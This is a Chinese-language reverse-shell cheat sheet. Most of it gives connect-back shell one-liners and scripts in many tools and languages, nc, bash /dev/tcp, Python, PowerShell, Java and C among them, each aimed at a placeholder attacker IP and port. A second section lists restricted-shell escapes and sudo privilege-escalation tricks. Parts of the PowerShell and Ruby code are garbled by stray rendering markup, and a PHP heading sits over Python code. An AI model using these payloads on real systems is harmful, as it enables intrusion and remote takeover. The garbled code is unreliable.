反向shell-备忘录
通常在获得远程代码执行之后,我们希望获得一些交互式访问——而不是每次发出单个命令只拿到单个回显,或者只能与 web shell 交互。从实战的意义来讲,反弹 shell 是非常有必要的,以下将从不同的工具出发逐一介绍。

nc
listen:

nc -nlvp PORT
connect:

nc -e /bin/sh IP PORT
or

nc -c sh IP PORT
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f
socat
listen:

socat tcp-listen:PORT -
connect:

socat exec:/bin/sh tcp:IP:PORT
交互式版本

listen:

socat file:tty,raw,echo=0 tcp-listen:PORT
connect:

socat exec:/bin/sh,pty,stderr,setsid,sigint,sane tcp:IP:PORT
ncat
listen:

ncat —allow IP -vnl PORT —ssl
connect:

ncat —exec /bin/sh —ssl IP PORT
sbd
listen:

sbd -lp PORT
connect:

sbd -e /bin/sh HOST PORT
加密版本

listen:

sbd -l -c on -k ENCRYPTION_PHRASE -p PORT
connect:

sbd -k ENCRYPTION_PHRASE -e /bin/sh HOST PORT
bash
TCP

bash -i >& /dev/tcp/IP/PORT 0>&1
or

bash -c ‘bash -i >& /dev/tcp/IP/PORT 0>&1’
使用 nc 的 UDP 协议版本:

nc -u -lvp PORT
connect:

sh -i >& /dev/udp/IP/PORT 0>&1
php
简单的php代码版本:

php -r ‘$sock=fsockopen(“IP”, PORT);exec(“/bin/sh -i <&3 >&3 2>&3”);’
完整的 PHP 脚本,带有指定要连接的 IP 地址和端口的表单:

!/usr/bin/env python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“IP”, PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call([“/bin/sh”,”-i”])
或从命令行使用python -c

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“IP”, PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”])’
Ruby
#!/usr/bin/ruby
require ‘socket’;
c=TCPSocket.new(‘IP’, PORT)
shell 备忘录 - 图1%0A#card=math&code=stdin.reopen%28c%29%0A&id=fDHzF)stdout.reopen(c)
shell 备忘录 - 图2%0A#card=math&code=stderr.reopen%28c%29%0A&id=gSxWU)stdin.each_line{|l|l=l.strip;next if l.length==0;(IO.popen(l,”rb”){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }
或作为单行:

ruby -rsocket -e’f=TCPSocket.open(“IP”, PORT).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’
Golang
使用源代码创建文件,运行然后删除源文件:

package main;
import”os/exec”;
import”net”;
func main() {
c, _ := net.Dial(“tcp”,”IP:PORT”);
cmd := exec.Command(“/bin/sh”);
cmd.Stdin=c;
cmd.Stdout = c;
cmd.Stderr = c;
cmd.Run()
}
保存文件,例如test.go,构建并运行:go run test.go

或者直接在命令行执行:

echo ‘package main;import”os/exec”;import”net”;func main(){c,_:=net.Dial(“tcp”,”IP:PORT”);cmd:=exec.Command(“/bin/sh”);cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}’ > /tmp/rev.go && go run /tmp/test.go && rm /tmp/test.go
Powershell
shell 备忘录 - 图3port = ‘PORT’
function cleanup {
if ($client.Connected -eq shell 备忘录 - 图4%20%7B#card=math&code=true%29%20%7B&id=RGGKG)client.Close()}
if ($process.ExitCode -ne shell 备忘录 - 图5%20%7B#card=math&code=null%29%20%7B&id=pPkRz)process.Close()}
exit}
shell 备忘录 - 图6client.connect(shell 备忘录 - 图7port)
$stream = shell 备忘录 - 图8%0A#card=math&code=client.GetStream%28%29%0A&id=jSQHV)networkbuffer = New-Object System.Byte[] shell 备忘录 - 图9process = New-Object System.Diagnostics.Process
shell 备忘录 - 图10process.StartInfo.RedirectStandardInput = 1
shell 备忘录 - 图11process.StartInfo.RedirectStandardError = 1
shell 备忘录 - 图12process.Start()
$inputstream = shell 备忘录 - 图13outputstream = shell 备忘录 - 图14encoding = new-object System.Text.AsciiEncoding
while(shell 备忘录 - 图15%20-ne%20-1)%7B#card=math&code=outputstream.Peek%28%29%20-ne%20-1%29%7B&id=LUOqh)out += shell 备忘录 - 图16outputstream.Read())}
shell 备忘录 - 图17encoding.GetBytes(shell 备忘录 - 图18%2C0%2C#card=math&code=out%29%2C0%2C&id=EOoRs)out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not shell 备忘录 - 图19%20%7B%0Aif%20(#card=math&code=done%29%20%7B%0Aif%20%28&id=ZcWLl)client.Connected -ne shell 备忘录 - 图20%20%7Bcleanup%7D%0A#card=math&code=true%29%20%7Bcleanup%7D%0A&id=ASI8r)pos = 0; shell 备忘录 - 图21i -gt 0) -and ($pos -lt shell 备忘录 - 图22)%20%7B%0A#card=math&code=networkbuffer.Length%29%29%20%7B%0A&id=DRnkm)read = shell 备忘录 - 图23networkbuffer,shell 备忘录 - 图24networkbuffer.Length - shell 备忘录 - 图25%0A#card=math&code=pos%29%0A&id=lcuvL)pos+=shell 备忘录 - 图26pos -and (shell 备忘录 - 图27(shell 备忘录 - 图28%5D%20-contains%2010))%20%7Bbreak%7D%7D%0Aif%20(#card=math&code=pos-1%29%5D%20-contains%2010%29%29%20%7Bbreak%7D%7D%0Aif%20%28&id=g93J3)pos -gt 0) {
$string = shell 备忘录 - 图29networkbuffer,0,shell 备忘录 - 图30%0A#card=math&code=pos%29%0A&id=M9kpi)inputstream.write(shell 备忘录 - 图31%0Astart-sleep%201%0Aif%20(#card=math&code=string%29%0Astart-sleep%201%0Aif%20%28&id=FLjot)process.ExitCode -ne shell 备忘录 - 图32%20%7Bcleanup%7D%0Aelse%20%7B%0A#card=math&code=null%29%20%7Bcleanup%7D%0Aelse%20%7B%0A&id=GzhkM)out = shell 备忘录 - 图33outputstream.Read())
while(shell 备忘录 - 图34%20-ne%20-1)%7B%0A#card=math&code=outputstream.Peek%28%29%20-ne%20-1%29%7B%0A&id=sssap)out += shell 备忘录 - 图35outputstream.Read()); if ($out -eq shell 备忘录 - 图36%20%7B#card=math&code=string%29%20%7B&id=jTaHU)out = ‘’}}
shell 备忘录 - 图37encoding.GetBytes(shell 备忘录 - 图38%2C0%2C#card=math&code=out%29%2C0%2C&id=ODrpQ)out.length)
$out = shell 备忘录 - 图39string = $null}} else {cleanup}}
或作为单行:

powershell -nop -c “shell 备忘录 - 图40%3B#card=math&code=client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27IP%27%2C%20PORT%29%3B&id=XiJRN)stream = shell 备忘录 - 图41%3B%5Bbyte%5B%5D%5D#card=math&code=client.GetStream%28%29%3B%5Bbyte%5B%5D%5D&id=J5aUs)bytes = 0..65535|%{0};while(($i = shell 备忘录 - 图42bytes, 0, shell 备忘录 - 图43)%20-ne%200)%7B%3B#card=math&code=bytes.Length%29%29%20-ne%200%29%7B%3B&id=x2iFJ)data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, shell 备忘录 - 图44%3B#card=math&code=i%29%3B&id=GIQZ8)sendback = (iex shell 备忘录 - 图45%3B#card=math&code=data%202%3E%261%20%7C%20Out-String%20%29%3B&id=A4RoH)sendback2 = shell 备忘录 - 图46.Path%20%2B%20’%3E%20’%3B#card=math&code=sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B&id=UCzl0)sendbyte = ([text.encoding]::ASCII).GetBytes(shell 备忘录 - 图47%3B#card=math&code=sendback2%29%3B&id=JAVNm)stream.Write(shell 备忘录 - 图48sendbyte.Length);shell 备忘录 - 图49%7D%3B#card=math&code=stream.Flush%28%29%7D%3B&id=hmQMm)client.Close()”
nodejs
创建一个js文件

var net = require(“net”), sh = require(“child_process”).exec(“/bin/bash”);
var client = new net.Socket();
client.connect(PORT, “IP”, function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});
or

require(“child_process”).exec(‘bash -c “bash -i >& /dev/tcp/IP/PORT 0>&1”‘)
or

var x = global.process.mainModule.require
x(‘child_process’).exec(‘nc IP PORT -e /bin/bash’)
然后运行:

nodejs rev.js
或者直接执行命令

nodejs -e “require(‘child_process’).exec(‘nc -e /bin/sh IP PORT’)”
不依赖 nc 的版本:

nodejs -e “require(‘child_process’).exec(‘bash -c “bash -i >& /dev/tcp/IP/PORT 0>&1”‘)”
openssl
listen:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port PORT
connect:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -no_ign_eof -connect IP:PORT > /tmp/s; rm /tmp/s
Awk
连接到监听器;输入 exit 即可关闭该反向 shell

awk ‘BEGIN {s = “/inet/tcp/0/IP/PORT”; while(42) { do{ printf “shell>” |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != “exit”) close(s); }}’ /dev/null
Lua
lua -e “require(‘socket’);require(‘os’);t=socket.tcp();t:connect(‘IP’,’PORT’);os.execute(‘/bin/sh -i <&3 >&3 2>&3’);”
Java
Linux

import java.net.Socket;
import java.io.OutputStream;
import java.io.InputStream;

public class Rev {
public static void main(String[] args) {

String host=”IP”;
int port=PORT;
String cmd=”/bin/sh”;
try {
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
} catch (Exception e) {}
}
}
Windows

import java.net.Socket;
import java.io.OutputStream;
import java.io.InputStream;

public class Rev {
public static void main(String[] args) {

String host=”IP”;
int port=PORT;
String cmd=”cmd.exe”;
try {
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
} catch (Exception e) {}
}
}
Groovy
Linux

String host=”IP”;
int port=PORT;
String cmd=”/bin/bash”;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {p.exitValue();
break;
}
catch (Exception e){}
};
p.destroy();
s.close();
命令行执行:

groovy -e ‘String host=”IP”;int port=PORT;String cmd=”/bin/bash”;Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();’
或者通过线程执行:

Thread.start {
String host=”IP”;
int port=PORT;
String cmd=”/bin/bash”;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();break;
}
catch (Exception e){}
};
p.destroy();
s.close();
}
Windows

String host=”IP”;
int port=PORT;
String cmd=”cmd.exe”;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
}catch (Exception e){}
};
p.destroy();
s.close();
一行搞定:

groovy -e ‘String host=”IP”;int port=PORT;String cmd=”cmd.exe”;Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();’
C
创建一个文件

include
#include
#include
#include
#include
#include
#include

int main(void) {
int sockfd;
int lportno = PORT;
struct sockaddr_in serv_addr;
char const params[] = {“/bin/sh”, NULL};
char
const environ[] = {NULL};

sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = inet_addr(“IP”);
serv_addr.sin_port = htons(lportno);
connect(sockfd, (struct sockaddr *) &serv_addr, 16);

dup2(sockfd, 0);
dup2(0, 1);
dup2(0, 2);
execve(“/bin/sh”, params, environ);
}
shell 逃逸指南
Vim
:sh
:!/bin/bash
rVim
rvim —cmd “:py import os;os.system(‘/bin/bash’)”
or

:python import os; os.system(“/bin/bash”)
nano / pico
直接运行nano:

bashnano -s /bin/bash
在文本内容编辑:

/bin/bash
按下Ctrl-T运行拼写检查

man, less, more
!shell
!/bin/bash
Awk
awk ‘BEGIN {system(“/bin/sh”)}’
find
find /dev/zero -exec /bin/bash ;
rbash
bash < 4.4

BASH_CMDS[poop]=/bin/bash;poop
文件读取:

$(< ../../etc/passwd)
或者

mapfile ARRAY < ../../etc/passwd ARRAY
echo $ARRAY
通过 ssh 连接时不加载配置文件:

ssh user@IP-ADDRESS -t “bash —noprofile”
Python
python
echo os.system(‘/bin/bash’)
MySQL client
mysql>! bash
bash>
gdb
(gdb) ! id
(gdb) ! /bin/bash
(gdb) shell id
Netcat, ncat
nc -vlp PORT -e /bin/bash
nc HOST PORT
Nmap
nmap —script <(echo ‘os.execute(“/bin/sh”)’)
通过脚本

nmap —script /tmp/script.nse
script.nse内容为

os.execute(“id”)
tcpdump
cat < shell.sh
#!/bin/bash
/bin/bash
EOF
chmod +x shell.sh
sudo tcpdump -G 1 -z ./shell.sh -w 1.pcap
读取文件时执行脚本,test.sh 内容为:

!/bin/sh
id
创建一个大于 1MB 的 test.pcap 文件,然后运行 tcpdump:

tcpdump -r /tmp/test.pcap -C 1 -w /dev/null -z /tmp/test.sh
tar
tar c —checkpoint=1 —checkpoint-action=exec=bash a a.tar
zip
zip /tmp/test.zip /tmp/test -T —unzip-command=”sh -c /bin/bash”
strace
strace -o/dev/null /bin/bash
expect
except spawn sh then sh
SCP
cat >/tmp/shell.sh </bin/bash >&2 0>&2
EOF
chmod +x shell.sh
scp -S /tmp/shell.sh x y:
ssh
ssh -o ProxyCommand=/tmp/shell.sh localhost
git
git -c core.pager=/tmp/shell.sh —paginate help
or

git commit
或使用rebase

git rebase —exec “COMMAND” master
或者:

git rebase -ix “COMMAND” master
script
script -c /bin/bash /tmp/a
mount
user@host:~$ sudo mount -o bind /bin/bash /bin/mount
user@host:~$ sudo mount
root@host:~# id
uid=0(root) gid=0(root) groups=0(root)
mail
仅限 GNU 版本:

sudo mail —exec=’!/bin/sh’
其他:

sudo -u USER mail -u USER -s xxxx aaa
~!id
sqlite
sqlite3 /dev/null ‘.shell /bin/sh’
通过加载扩展:

include
void main()
{
execl(“/bin/sh”, NULL);
}
编译为.so:

gcc -g -fPIC -shared /tmp/shell.c -o /tmp/shell.so
在 sqlite shell 中加载扩展:

sqlite> .load /tmp/shell.so main
socat
socat file:/bin/sh file:sh,create,perm=4755 > /dev/null
./sh
or

socat exec:/bin/sh -
apt-get / apt / aptitude
a:

apt-get update -o APT::Update::Pre-Invoke::=”/bin/bash -i”
b:

sudo apt-get changelog apt
!/bin/sh
openssl
读取文件:

openssl enc -in test.txt
写文件:

LFILE=file_to_write
echo DATA | openssl enc -out “$LFILE”
或者

LFILE=file_to_write
TF=$(mktemp)
echo “DATA” > shell 备忘录 - 图50TF” -out “$LFILE”
Python

import pty
pty.spawn(‘/bin/bash’)
or

import os
os.system(‘ls’)
os.system(‘/bin/bash’)
Ruby
ruby -e ‘exec “/bin/sh”‘
or

irb
irb(main):001:0> exec ‘/bin/bash’
Perl
perl -e ‘exec “/bin/sh”;’
Lua
os.execute(‘/bin/sh’)
或者

lua -e ‘os.execute(“/bin/sh”)’